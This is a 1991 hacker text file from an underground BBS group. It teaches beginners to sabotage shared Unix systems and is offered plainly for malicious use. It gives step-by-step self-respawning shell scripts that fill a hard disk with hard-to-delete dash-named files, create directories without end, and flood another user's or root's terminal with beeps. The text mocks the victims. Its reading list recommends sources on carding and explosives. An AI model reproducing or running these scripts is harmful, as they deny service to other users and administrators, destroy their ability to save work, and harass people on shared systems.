home *** CD-ROM | disk | FTP | other *** search
/ Everything For A Hacker / 19990506-[HACK].iso / UNIX / UNIXHELL.DOC < prev    next >
Text File  |  1991-11-12  |  14KB  |  313 lines

  1.  
  2.  
  3.  * Data Kult *            ░▓░▓░▓░▓░▓░▓░▓░▓░      * Kryptic Night *
  4.    Lord Logics            ▓░   Raising   ░▓        Bounty Hunter
  5.    Shadow Walker          ░▓    Hell     ▓░        Nacht Habicht
  6.     - S M C -             ▓░  with Unix  ░▓          - S M C -
  7.  Realm of Infinity        ░▓Kryptic Night▓░       The Viking's Den
  8.    (503)629-0814          ▓░▓░▓░▓░▓░▓░▓░▓░▓        (408)867-1224
  9.      SMC Home                 - S M C -             Western Dist.
  10.                             Production # 3
  11.  ────────────────────────────────────────────────────────────────────────────
  12.  
  13. I  - Introduction
  14.  
  15.   This file will describe several ways to cause mischief on a Unix system.
  16. Like the other SMC Productions, I will try to present the information at a 
  17. beginners level. However, all levels of hackers should benefit in some way 
  18. from the information contained within. And now... on with our show...
  19.  
  20.  
  21. II - How To Fill a Hard Disk
  22.   
  23.   There are several ways to cause havoc by filling up a systems hard
  24. disk. Filling up a hard disk will make it so that the system cannot create
  25. the temporary files vital to it's efficient use. It will also cause other
  26. problems, such as a person trying to save a 10 page financial report, and
  27. finding that there is no room for it. Also, if the HD is full, the system
  28. will not run properly. You will be bombarded by a continuous stream of
  29. 'write failed, file system is full'. Over all, this is a very good way to 
  30. piss people off. 
  31.  
  32.   Step One
  33.     Create the following file with the 'ed [filename]' utility under the
  34. bourne shell, or the 'edit [filename]' under the C shell. The filename can 
  35. be whatever you want, here I will call it 'hah1'. Only type in what is 
  36. contained within '[]'s, the other text is what the system will send to
  37. you.
  38.  
  39. $[ed hah1]
  40. 0
  41. *[a]
  42. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  43. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  44. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  45. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  46. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  47. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  48. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  49. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  50. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  51. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  52. [echo Hahahahahahahahahahahahahahahahahahahahahah!!! >> -fucku!]
  53. [nohup hah1 &]
  54. [^C]
  55. *[w]
  56. 754
  57. *[q]
  58. $[chmod +r+w+x hah1]
  59. $[nohup hah1 &]
  60. 1234
  61. $
  62.  
  63.   This will create a file called '-fucku!'. Files beginning with a '-' 
  64. are very difficult to delete, as when you try to do a 'rm -fucku!'
  65. <rm - remove file> It interprets the '-f' as an option, it tries then
  66. to force delete the file 'ucku!'. As you can imagine.... this wouldn't
  67. quite work. The text after the echo can be anything you wish, I just
  68. used a sample text that is quite pointless and takes up space. The numbers
  69. represent the file size, and process number,  they will be different on 
  70. your system.
  71.   The file will add the text from the echo statement to the file '-fucku!'
  72. until it reaches the 'hah1 &' command, which will make it start over again.
  73. This is an endless loop. For as long as you are on-line, and their are 
  74. processes left, the file will continue to add to the file. This is a
  75. very slow method, but it's easy if you are starting from scratch. If
  76. you get a message such as 'cannot fork hah1: process terminated' that means
  77. that the loop is taking up so much memory that the system can no longer
  78. continue with that job. Don't worry, it will settle back to normal after all
  79. the processes are eventually killed, if it does, continue to run the file
  80. in the background until you have a '-fucku!' file that is about 100-200k
  81. long, this will allow us to progress to our next step.
  82.  
  83.   The command 'nohup hah1 &' tells unix to continue to run the 'hah1'
  84. in the background, even after you hangup. This means you can run the 
  85. program, hang up, and call back. This function will only work under 
  86. the bourne shell. If you have a prompt of '$', then you are using the
  87. bourne shell. This function will become exceedingly useful when we
  88. start with the next step.
  89.  
  90.   The command 'chmod +r+w+x hah1' will make the file readable, writable, and
  91. executable by you. This string may or may not be necessary on the system you
  92. are using. If you get a message such as 'hah1: Permission Denied' than you
  93. will need to use the chmod command. And now onto the next step...
  94.  
  95.    
  96.   Step Two
  97.     We will now explore the ever powerful 'cat' command. The 'cat' command
  98. is the equivalent of the MS-DOS 'type' command. We will use a function
  99. of the unix system called redirection that will allow us to 'cat' files
  100. into each other. This will cause the source file to be copied to the end
  101. of the destination file, I'm sure you're beginning to see the mischief
  102. you can cause with this.  
  103.    To begin with, create a file called '-fucku2' the same way you created
  104. the '-fucku!' file. Try to run the 'hah1' program until the new 'fucku2' 
  105. file is around 100-200k also. This isn't absolutely necessary, but it's 
  106. helpful and saves some time. 
  107.    Next, create the following file with the editor <'ed' or 'edit'>. 
  108. I will call it 'hah2', but you may call it whatever you wish.
  109.  
  110. $[ed hah2]
  111. 0
  112. *[a]
  113. [cat -fucku! >> -fucku2]
  114. [cat -fucku2 >> -fucku!]
  115. [no
  116. hup hah2 &]
  117. [^C]
  118. *[w]
  119. 61
  120. *[q]
  121. $[chmod +r+w+x hah2]
  122. $[nohup hah2 &]
  123. 7049
  124. $
  125.  
  126.   What we've just done is create a very short, and very nasty, program 
  127. that can fill 20 megs in under 5 minutes. The file when run will add the 
  128. contents of '-fucku!' to the end of '-fucku2', and do the reverse. This 
  129. means that when you have two files of 100k to begin with, you will get 
  130. the following results after every completed loop...
  131.  
  132. -fucku!  ..  -fucku2  ..  -fucku!  ..  -fucku2 
  133.  100k    >>   200k    >>    300k   >>    500k
  134.  700k    >>   1200k   >>    1900k  >>    3100k
  135.  
  136.   As you can see, the file grows VERY quickly. Set it up in the morning
  137. before school, come back and the HD should be completely full. You may
  138. wish to also run multiple write processes, just to confuse the system.
  139. If you do, rename the files to something appropriate, but maintain the
  140. base content. If you do it in several directories, the sysop will have
  141. to do some serious cleaning to get rid of it.
  142.   
  143.   Step Three
  144.     Sit back and laugh. If you wait awhile, in approximately 30 minutes,
  145. the average 40 meg hard drive will be full. I've tested this method on
  146. several systems, even an ancient VAX, and the results were more or less
  147. the same. The sysop, or any other user, will be able to write anything
  148. onto the system until this problem is resolved. Many programs need
  149. to create temporary files to even operate. These programs are now 
  150. completely unusable, except for the few that save to memory. To delete
  151. the files, the sysop will have to do one of several things, all of which
  152. are very unpleasant. And now for the next lesson...
  153.  
  154.  
  155. III - Mischief
  156.  
  157.   This section will describe a couple of ways of perpetrating mischief on a
  158. unix system. These ideas are for the most part harmless, but can definitely
  159. piss people off. The idea of a continuous subdir was molded from one
  160. presented by Shooting Shark.
  161.  
  162.    Idea #1
  163.      This method will create an endless amount of directories under a 
  164. the current directory. Create multiple files with different name and 
  165. directories to really annoy the 'sop. Type the following to accomplish this.
  166.  
  167. $[ed sub1]
  168. 0
  169. *[a]
  170. [mkdir -FuCkU!1]
  171. [chdir -FuCkU!1]
  172. [/xxx/xxx/sub1 &]
  173. [^C]
  174. *[w]
  175. 69
  176. *[q]
  177. $[chmod +r+w+x sub1]
  178. $[nohup sub1 &]
  179. 7099
  180. $
  181.  
  182.   This program will create a directory called '-FuCkU!1', change to that
  183. directory, then create another one under the first one, and so forth. It
  184. is an endless loop, and will continue virtually forever. The third line
  185. of the program contains a string '/xxx/xxx/sub1 &'. You will need to fill
  186. in the x's with your current directory. To find out your current directory 
  187. type 'pwd' this will print a string telling which directory you are in.
  188. Fill in the x's with this data. The rest of the program you should be able
  189. to figure out by now. Try it, you'll like it.
  190.  
  191.         
  192.    Idea #2
  193.      So, you've seen someone on the system that you really don't like? Or do
  194. you just want to piss someone off? This methods for you. This method will
  195. describe a way to send out data to another user, or terminal. Here is what
  196. you will want to type to create a file to anger the other user.
  197.  
  198. $[ed beep]
  199. 0
  200. *[a]
  201. [echo ^G ^G ^G ^G Wheee!!! ^G ^G ^G >> /dev/xxxx]
  202. [nohup beep &]
  203. [^C]
  204. *[w]
  205. 25
  206. *[q]
  207. $[chmod +r+w+x beep]
  208. $[nohup beep &]
  209. 8002
  210. $
  211.  
  212.   Fill in the '/dev/xxxx' with the terminal you want to annoy. To find out
  213. the terminal of the person you want to fuck over, type 'who' it will print 
  214. out something like this....
  215.  
  216. $[who]
  217. guest    ttyd0   Nov 30 19:06
  218. root     console Nov 30 19:20
  219. Bendover ttyd5   Nov 30 18:45
  220.  
  221. $
  222.  
  223.   The first column is the name of the user, the second column tells us 
  224. what terminal they are logged on as, and the third states at what time 
  225. they logged on. The second column is what we need right now. Fill in the
  226. x's with the terminal that you wish. If you wanted to bother the root, you
  227. would type '/dev/console', to bother guest type '/dev/ttyd0'. To bother
  228. more than one terminal, just add another line after the first 'echo' 
  229. statement with a different terminal identifier. With the 'nohup' command,
  230. the computer will send a continuous outpouring of beeps until he logs off
  231. or reboots the system. Try it on the terminal you are logged on under to
  232. see exactly what it does.
  233.  
  234.  
  235.  ───────────────────────────────────────────────────────────────────────────
  236.  
  237. IV - Conclusion
  238.  
  239.   These projects should be enough to get you started on your road to Unix
  240. Hell. With a little experience you will be able to think of new ideas that
  241. will alloy you access to the systems hidden features and assets. I will
  242. release other files on Unix in the near future, possibly one on basic Unix
  243. hacking, FTP, UUCP netting, or any number of other Unix related concepts.
  244. If you are interested in learning more on Unix, you can contact me on the 
  245. systems at the top of the file. Thus concludes one dark Kryptic Night...
  246.  
  247.  
  248.  
  249. V - Bibliography and Suggested Reading
  250.  
  251. Unix Use and Security From the Ground Up: by the Prophet in 1986
  252.          This is probably the BEST file I've ever seen on the subject
  253.          of Unix. It is written for the beginner, and contains valuable
  254.          information for the advanced user. The Prophet became a member 
  255.          of Lod/H and is currently serving a sentence of 20 months in
  256.          relation to the big Lod/H bust of '90.
  257.         
  258. Articles on unix trojans and mischief: by Shooting Shark
  259.          Shooting Shark presents some interesting information
  260.          on various ways to commit havoc on Unix systems.
  261.          You can find most of his essays in both Phrack and Lod
  262.          magazines.
  263.  
  264. Lod/H Tech Journals
  265.          The Legion of Doom/Hackers are perhaps the most skilled
  266.          and knowledgable hackers in the underground society.
  267.          Their 'Tech Journals' describe almost anything you'd ever
  268.          want to know about illegal activities. 
  269.  
  270. Phrack Magazines
  271.          Phrack is also one of the best sources for information on
  272.          a multitude of subjects, ranging from social engineering, 
  273.          to carding, to making explosives. For those with free time,
  274.          download all of the 32 articles released to date.
  275.          
  276.  
  277. Creating Users on Unix
  278.       This was my second text file release. It tells how to
  279.      create new users on a Unix system using the root account.
  280.       It is told for beginner and advanced hacker alike.
  281.  
  282. VI - Greets
  283.  
  284. Heh, Data Kult, when you gettin' Kelsea's phone number?
  285. Bounty Hunter, cool new software, hope you can work out the bugs.
  286. Lord Logics, ega STILL? Come on! Get with it!
  287. Scooter, chill with the 800's
  288. Oolon, get Entropy back up!
  289. Digital Derelict, Jerusalem is nothing.... you're going down... soon
  290.  
  291.  
  292.  
  293.                                                                               
  294.                      |                                                         
  295.                      |                          \                              
  296.                      |       /\/\     /          │\    ─┬─                     
  297.                      |     /      \ /            │  \ A │ A                    
  298.   |  /               |/| /        / \            │  /   │  /                   
  299.   |/                   |        <     \          │/     │/  U L T              
  300.   |\ RYPTIC          / |          \     \       /       │\                     
  301.   |  \     /           |            \                   │  \                   
  302.       |\  |            |              \                                        
  303.       | \ |                                                                    
  304.       |  \|IGHT                                                                
  305.      /    `                                                                    
  306.          
  307.                                      
  308.  
  309.  
  310.  - Kryptic Night, Data Kult, Lord Logics, Shadow Walker, Bounty Hunter -
  311.                             Nacht Habicht
  312.  
  313.